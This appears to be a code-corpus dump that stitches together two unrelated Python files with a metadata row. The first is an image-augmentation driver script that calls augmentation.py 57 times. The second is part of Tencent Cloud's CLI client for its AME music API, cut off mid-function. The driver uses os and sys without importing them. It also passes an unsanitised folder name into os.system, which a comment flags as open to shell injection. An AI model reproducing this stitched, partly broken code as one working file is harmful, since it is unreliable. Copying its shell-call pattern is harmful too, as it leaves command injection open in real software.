# Run every augmentation variant (rotation, blur, translation, noise, zoom)
# of augmentation.py over one segmented image folder, appending each run's
# stdout to output.txt. Usage: python dataGenerator.py <folder-name>
# (The 57 variant invocations were previously 57 copy-pasted os.system lines.)

def variant_names():
    """Return the augmentation variant names in the exact order they are run."""
    variants = []
    # rotations by +/-1..5 degrees
    variants += ["rot_%d" % d for d in [1, 2, 3, 4, 5, -1, -2, -3, -4, -5]]
    # blur strengths 0.1..0.5
    variants += ["blur_0.%d" % i for i in range(1, 6)]
    # translation sweep 1: x alternates 1/2, y = 1..15
    variants += ["trans_%d_%d" % (1 if dy % 2 else 2, dy) for dy in range(1, 16)]
    # translation sweep 2: x = 1..15, y alternates 1/2
    # (trans_1_1 also appeared in sweep 1; the duplicate run is preserved)
    variants += ["trans_%d_%d" % (dx, 1 if dx % 2 else 2) for dx in range(1, 16)]
    # translation sweep 3: diagonal 3..10
    variants += ["trans_%d_%d" % (d, d) for d in range(3, 11)]
    # random noise
    variants += ["noise_0.01", "noise_0.02"]
    # zoom (crop margins)
    variants += ["zoom_-3_-3_-3_-3", "zoom_-5_-5_-5_-5"]
    return variants

def main():
    """Augment the folder named by argv[1]; exits with IndexError if missing."""
    file_name = sys.argv[1]
    for variant in variant_names():
        # NOTE(review): the command goes through the shell, so a folder name
        # containing shell metacharacters would be interpreted by it; confirm
        # callers only pass plain names before hardening with subprocess.
        os.system('python -W ignore augmentation.py ../dataset/segmented/'
                  + file_name + ' ' + variant + ' | tee -a output.txt ')
    print("augmented folder (" + file_name + ") successfully")
    print("--------")

if __name__ == "__main__":
    main()
| 88.4875 | 122 | 0.691906 | 1,015 | 7,079 | 4.726108 | 0.055172 | 0.048364 | 0.120909 | 0.157182 | 0.956223 | 0.947676 | 0.924119 | 0.924119 | 0.924119 | 0.924119 | 0 | 0.021154 | 0.138579 | 7,079 | 79 | 123 | 89.607595 | 0.765497 | 0.04591 | 0 | 0.032787 | 0 | 0 | 0.7311 | 0.177438 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.016393 | 0 | 0.016393 | 0.032787 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1c811881399a5a4658964c650b2665b48c8615d9 | 57,993 | py | Python | tccli/services/ame/ame_client.py | HS-Gray/tencentcloud-cli | 3822fcfdfed570fb526fe49abe6793e2f9127f4a | [
"Apache-2.0"
] | 47 | 2018-05-31T11:26:25.000Z | 2022-03-08T02:12:45.000Z | tccli/services/ame/ame_client.py | HS-Gray/tencentcloud-cli | 3822fcfdfed570fb526fe49abe6793e2f9127f4a | [
"Apache-2.0"
] | 23 | 2018-06-14T10:46:30.000Z | 2022-02-28T02:53:09.000Z | tccli/services/ame/ame_client.py | HS-Gray/tencentcloud-cli | 3822fcfdfed570fb526fe49abe6793e2f9127f4a | [
"Apache-2.0"
] | 22 | 2018-10-22T09:49:45.000Z | 2022-03-30T08:06:04.000Z | # -*- coding: utf-8 -*-
import os
import sys
import json
import tccli.options_define as OptionsDefine
import tccli.format_output as FormatOutput
from tccli import __version__
from tccli.utils import Utils
from tccli.exceptions import ConfigurationError, ClientError, ParamError
from tencentcloud.common import credential
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.ame.v20190916 import ame_client as ame_client_v20190916
from tencentcloud.ame.v20190916 import models as models_v20190916
from jmespath import search
import time
from tccli import six
def doDescribeKTVMusicDetail(args, parsed_globals):
    """Invoke the DescribeKTVMusicDetail API and print the JSON response.

    Builds credentials and an AmeClient from the global CLI options, sends
    the request built from ``args``, and optionally polls until the
    configured waiter condition holds.

    :param args: dict of action parameters for the request model.
    :param parsed_globals: parsed global CLI options.
    :raises ClientError: if the waiter exceeds its configured timeout.
    """
    g_param = parse_global_arg(parsed_globals)
    # Credential precedence: CVM role > STS assume-role > static secret keys.
    if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
        cred = credential.CVMRoleCredential()
    elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
        cred = credential.STSAssumeRoleCredential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
            g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
        )
    else:
        cred = credential.Credential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
        )
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeKTVMusicDetailRequest()
    model.from_json_string(json.dumps(args))
    start_time = time.time()
    while True:
        rsp = client.DescribeKTVMusicDetail(model)
        result = rsp.to_json_string()
        try:
            json_obj = json.loads(result)
        except TypeError:
            # Some interpreters return bytes from to_json_string; decode first.
            json_obj = json.loads(result.decode('utf-8'))
        if not g_param[OptionsDefine.Waiter]:
            break
        # Hoist the waiter config; the original re-looked it up on every use.
        waiter = g_param['OptionsDefine.WaiterInfo']
        if search(waiter['expr'], json_obj) == waiter['to']:
            break
        if time.time() - start_time >= waiter['timeout']:
            raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
            (waiter['expr'], waiter['to'], search(waiter['expr'], json_obj)))
        print('Inquiry result is %s.' % search(waiter['expr'], json_obj))
        time.sleep(waiter['interval'])
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeItemById(args, parsed_globals):
    """Invoke the DescribeItemById API and print the JSON response.

    Builds credentials and an AmeClient from the global CLI options, sends
    the request built from ``args``, and optionally polls until the
    configured waiter condition holds.

    :param args: dict of action parameters for the request model.
    :param parsed_globals: parsed global CLI options.
    :raises ClientError: if the waiter exceeds its configured timeout.
    """
    g_param = parse_global_arg(parsed_globals)
    # Credential precedence: CVM role > STS assume-role > static secret keys.
    if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
        cred = credential.CVMRoleCredential()
    elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
        cred = credential.STSAssumeRoleCredential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
            g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
        )
    else:
        cred = credential.Credential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
        )
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeItemByIdRequest()
    model.from_json_string(json.dumps(args))
    start_time = time.time()
    while True:
        rsp = client.DescribeItemById(model)
        result = rsp.to_json_string()
        try:
            json_obj = json.loads(result)
        except TypeError:
            # Some interpreters return bytes from to_json_string; decode first.
            json_obj = json.loads(result.decode('utf-8'))
        if not g_param[OptionsDefine.Waiter]:
            break
        # Hoist the waiter config; the original re-looked it up on every use.
        waiter = g_param['OptionsDefine.WaiterInfo']
        if search(waiter['expr'], json_obj) == waiter['to']:
            break
        if time.time() - start_time >= waiter['timeout']:
            raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
            (waiter['expr'], waiter['to'], search(waiter['expr'], json_obj)))
        print('Inquiry result is %s.' % search(waiter['expr'], json_obj))
        time.sleep(waiter['interval'])
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeStations(args, parsed_globals):
    """Invoke the DescribeStations API and print the JSON response.

    Builds credentials and an AmeClient from the global CLI options, sends
    the request built from ``args``, and optionally polls until the
    configured waiter condition holds.

    :param args: dict of action parameters for the request model.
    :param parsed_globals: parsed global CLI options.
    :raises ClientError: if the waiter exceeds its configured timeout.
    """
    g_param = parse_global_arg(parsed_globals)
    # Credential precedence: CVM role > STS assume-role > static secret keys.
    if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
        cred = credential.CVMRoleCredential()
    elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
        cred = credential.STSAssumeRoleCredential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
            g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
        )
    else:
        cred = credential.Credential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
        )
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeStationsRequest()
    model.from_json_string(json.dumps(args))
    start_time = time.time()
    while True:
        rsp = client.DescribeStations(model)
        result = rsp.to_json_string()
        try:
            json_obj = json.loads(result)
        except TypeError:
            # Some interpreters return bytes from to_json_string; decode first.
            json_obj = json.loads(result.decode('utf-8'))
        if not g_param[OptionsDefine.Waiter]:
            break
        # Hoist the waiter config; the original re-looked it up on every use.
        waiter = g_param['OptionsDefine.WaiterInfo']
        if search(waiter['expr'], json_obj) == waiter['to']:
            break
        if time.time() - start_time >= waiter['timeout']:
            raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
            (waiter['expr'], waiter['to'], search(waiter['expr'], json_obj)))
        print('Inquiry result is %s.' % search(waiter['expr'], json_obj))
        time.sleep(waiter['interval'])
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribePackages(args, parsed_globals):
    """Invoke the DescribePackages API and print the JSON response.

    Builds credentials and an AmeClient from the global CLI options, sends
    the request built from ``args``, and optionally polls until the
    configured waiter condition holds.

    :param args: dict of action parameters for the request model.
    :param parsed_globals: parsed global CLI options.
    :raises ClientError: if the waiter exceeds its configured timeout.
    """
    g_param = parse_global_arg(parsed_globals)
    # Credential precedence: CVM role > STS assume-role > static secret keys.
    if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
        cred = credential.CVMRoleCredential()
    elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
        cred = credential.STSAssumeRoleCredential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
            g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
        )
    else:
        cred = credential.Credential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
        )
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribePackagesRequest()
    model.from_json_string(json.dumps(args))
    start_time = time.time()
    while True:
        rsp = client.DescribePackages(model)
        result = rsp.to_json_string()
        try:
            json_obj = json.loads(result)
        except TypeError:
            # Some interpreters return bytes from to_json_string; decode first.
            json_obj = json.loads(result.decode('utf-8'))
        if not g_param[OptionsDefine.Waiter]:
            break
        # Hoist the waiter config; the original re-looked it up on every use.
        waiter = g_param['OptionsDefine.WaiterInfo']
        if search(waiter['expr'], json_obj) == waiter['to']:
            break
        if time.time() - start_time >= waiter['timeout']:
            raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
            (waiter['expr'], waiter['to'], search(waiter['expr'], json_obj)))
        print('Inquiry result is %s.' % search(waiter['expr'], json_obj))
        time.sleep(waiter['interval'])
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeLyric(args, parsed_globals):
    """Invoke the DescribeLyric API and print the JSON response.

    Builds credentials and an AmeClient from the global CLI options, sends
    the request built from ``args``, and optionally polls until the
    configured waiter condition holds.

    :param args: dict of action parameters for the request model.
    :param parsed_globals: parsed global CLI options.
    :raises ClientError: if the waiter exceeds its configured timeout.
    """
    g_param = parse_global_arg(parsed_globals)
    # Credential precedence: CVM role > STS assume-role > static secret keys.
    if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
        cred = credential.CVMRoleCredential()
    elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
        cred = credential.STSAssumeRoleCredential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
            g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
        )
    else:
        cred = credential.Credential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
        )
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeLyricRequest()
    model.from_json_string(json.dumps(args))
    start_time = time.time()
    while True:
        rsp = client.DescribeLyric(model)
        result = rsp.to_json_string()
        try:
            json_obj = json.loads(result)
        except TypeError:
            # Some interpreters return bytes from to_json_string; decode first.
            json_obj = json.loads(result.decode('utf-8'))
        if not g_param[OptionsDefine.Waiter]:
            break
        # Hoist the waiter config; the original re-looked it up on every use.
        waiter = g_param['OptionsDefine.WaiterInfo']
        if search(waiter['expr'], json_obj) == waiter['to']:
            break
        if time.time() - start_time >= waiter['timeout']:
            raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
            (waiter['expr'], waiter['to'], search(waiter['expr'], json_obj)))
        print('Inquiry result is %s.' % search(waiter['expr'], json_obj))
        time.sleep(waiter['interval'])
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeMusicSaleStatus(args, parsed_globals):
    """Invoke the DescribeMusicSaleStatus API and print the JSON response.

    Builds credentials and an AmeClient from the global CLI options, sends
    the request built from ``args``, and optionally polls until the
    configured waiter condition holds.

    :param args: dict of action parameters for the request model.
    :param parsed_globals: parsed global CLI options.
    :raises ClientError: if the waiter exceeds its configured timeout.
    """
    g_param = parse_global_arg(parsed_globals)
    # Credential precedence: CVM role > STS assume-role > static secret keys.
    if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
        cred = credential.CVMRoleCredential()
    elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
        cred = credential.STSAssumeRoleCredential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
            g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
        )
    else:
        cred = credential.Credential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
        )
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeMusicSaleStatusRequest()
    model.from_json_string(json.dumps(args))
    start_time = time.time()
    while True:
        rsp = client.DescribeMusicSaleStatus(model)
        result = rsp.to_json_string()
        try:
            json_obj = json.loads(result)
        except TypeError:
            # Some interpreters return bytes from to_json_string; decode first.
            json_obj = json.loads(result.decode('utf-8'))
        if not g_param[OptionsDefine.Waiter]:
            break
        # Hoist the waiter config; the original re-looked it up on every use.
        waiter = g_param['OptionsDefine.WaiterInfo']
        if search(waiter['expr'], json_obj) == waiter['to']:
            break
        if time.time() - start_time >= waiter['timeout']:
            raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
            (waiter['expr'], waiter['to'], search(waiter['expr'], json_obj)))
        print('Inquiry result is %s.' % search(waiter['expr'], json_obj))
        time.sleep(waiter['interval'])
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeItems(args, parsed_globals):
    """Invoke the DescribeItems API and print the JSON response.

    Builds credentials and an AmeClient from the global CLI options, sends
    the request built from ``args``, and optionally polls until the
    configured waiter condition holds.

    :param args: dict of action parameters for the request model.
    :param parsed_globals: parsed global CLI options.
    :raises ClientError: if the waiter exceeds its configured timeout.
    """
    g_param = parse_global_arg(parsed_globals)
    # Credential precedence: CVM role > STS assume-role > static secret keys.
    if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
        cred = credential.CVMRoleCredential()
    elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
        cred = credential.STSAssumeRoleCredential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
            g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
        )
    else:
        cred = credential.Credential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
        )
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeItemsRequest()
    model.from_json_string(json.dumps(args))
    start_time = time.time()
    while True:
        rsp = client.DescribeItems(model)
        result = rsp.to_json_string()
        try:
            json_obj = json.loads(result)
        except TypeError:
            # Some interpreters return bytes from to_json_string; decode first.
            json_obj = json.loads(result.decode('utf-8'))
        if not g_param[OptionsDefine.Waiter]:
            break
        # Hoist the waiter config; the original re-looked it up on every use.
        waiter = g_param['OptionsDefine.WaiterInfo']
        if search(waiter['expr'], json_obj) == waiter['to']:
            break
        if time.time() - start_time >= waiter['timeout']:
            raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
            (waiter['expr'], waiter['to'], search(waiter['expr'], json_obj)))
        print('Inquiry result is %s.' % search(waiter['expr'], json_obj))
        time.sleep(waiter['interval'])
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeKTVPlaylistDetail(args, parsed_globals):
    """Invoke the DescribeKTVPlaylistDetail API and print the JSON response.

    Builds credentials and an AmeClient from the global CLI options, sends
    the request built from ``args``, and optionally polls until the
    configured waiter condition holds.

    :param args: dict of action parameters for the request model.
    :param parsed_globals: parsed global CLI options.
    :raises ClientError: if the waiter exceeds its configured timeout.
    """
    g_param = parse_global_arg(parsed_globals)
    # Credential precedence: CVM role > STS assume-role > static secret keys.
    if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
        cred = credential.CVMRoleCredential()
    elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
        cred = credential.STSAssumeRoleCredential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
            g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
        )
    else:
        cred = credential.Credential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
        )
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeKTVPlaylistDetailRequest()
    model.from_json_string(json.dumps(args))
    start_time = time.time()
    while True:
        rsp = client.DescribeKTVPlaylistDetail(model)
        result = rsp.to_json_string()
        try:
            json_obj = json.loads(result)
        except TypeError:
            # Some interpreters return bytes from to_json_string; decode first.
            json_obj = json.loads(result.decode('utf-8'))
        if not g_param[OptionsDefine.Waiter]:
            break
        # Hoist the waiter config; the original re-looked it up on every use.
        waiter = g_param['OptionsDefine.WaiterInfo']
        if search(waiter['expr'], json_obj) == waiter['to']:
            break
        if time.time() - start_time >= waiter['timeout']:
            raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
            (waiter['expr'], waiter['to'], search(waiter['expr'], json_obj)))
        print('Inquiry result is %s.' % search(waiter['expr'], json_obj))
        time.sleep(waiter['interval'])
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeAuthInfo(args, parsed_globals):
    """Invoke the DescribeAuthInfo API and print the JSON response.

    Builds credentials and an AmeClient from the global CLI options, sends
    the request built from ``args``, and optionally polls until the
    configured waiter condition holds.

    :param args: dict of action parameters for the request model.
    :param parsed_globals: parsed global CLI options.
    :raises ClientError: if the waiter exceeds its configured timeout.
    """
    g_param = parse_global_arg(parsed_globals)
    # Credential precedence: CVM role > STS assume-role > static secret keys.
    if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
        cred = credential.CVMRoleCredential()
    elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
        cred = credential.STSAssumeRoleCredential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
            g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
        )
    else:
        cred = credential.Credential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
        )
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeAuthInfoRequest()
    model.from_json_string(json.dumps(args))
    start_time = time.time()
    while True:
        rsp = client.DescribeAuthInfo(model)
        result = rsp.to_json_string()
        try:
            json_obj = json.loads(result)
        except TypeError:
            # Some interpreters return bytes from to_json_string; decode first.
            json_obj = json.loads(result.decode('utf-8'))
        if not g_param[OptionsDefine.Waiter]:
            break
        # Hoist the waiter config; the original re-looked it up on every use.
        waiter = g_param['OptionsDefine.WaiterInfo']
        if search(waiter['expr'], json_obj) == waiter['to']:
            break
        if time.time() - start_time >= waiter['timeout']:
            raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
            (waiter['expr'], waiter['to'], search(waiter['expr'], json_obj)))
        print('Inquiry result is %s.' % search(waiter['expr'], json_obj))
        time.sleep(waiter['interval'])
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeKTVPlaylists(args, parsed_globals):
    """Invoke the DescribeKTVPlaylists API and print the JSON response.

    Builds credentials and an AmeClient from the global CLI options, sends
    the request built from ``args``, and optionally polls until the
    configured waiter condition holds.

    :param args: dict of action parameters for the request model.
    :param parsed_globals: parsed global CLI options.
    :raises ClientError: if the waiter exceeds its configured timeout.
    """
    g_param = parse_global_arg(parsed_globals)
    # Credential precedence: CVM role > STS assume-role > static secret keys.
    if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
        cred = credential.CVMRoleCredential()
    elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
        cred = credential.STSAssumeRoleCredential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
            g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
        )
    else:
        cred = credential.Credential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
        )
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeKTVPlaylistsRequest()
    model.from_json_string(json.dumps(args))
    start_time = time.time()
    while True:
        rsp = client.DescribeKTVPlaylists(model)
        result = rsp.to_json_string()
        try:
            json_obj = json.loads(result)
        except TypeError:
            # Some interpreters return bytes from to_json_string; decode first.
            json_obj = json.loads(result.decode('utf-8'))
        if not g_param[OptionsDefine.Waiter]:
            break
        # Hoist the waiter config; the original re-looked it up on every use.
        waiter = g_param['OptionsDefine.WaiterInfo']
        if search(waiter['expr'], json_obj) == waiter['to']:
            break
        if time.time() - start_time >= waiter['timeout']:
            raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
            (waiter['expr'], waiter['to'], search(waiter['expr'], json_obj)))
        print('Inquiry result is %s.' % search(waiter['expr'], json_obj))
        time.sleep(waiter['interval'])
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeMusic(args, parsed_globals):
    """Invoke the DescribeMusic API and print the JSON response.

    Builds credentials and an AmeClient from the global CLI options, sends
    the request built from ``args``, and optionally polls until the
    configured waiter condition holds.

    :param args: dict of action parameters for the request model.
    :param parsed_globals: parsed global CLI options.
    :raises ClientError: if the waiter exceeds its configured timeout.
    """
    g_param = parse_global_arg(parsed_globals)
    # Credential precedence: CVM role > STS assume-role > static secret keys.
    if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
        cred = credential.CVMRoleCredential()
    elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
        cred = credential.STSAssumeRoleCredential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
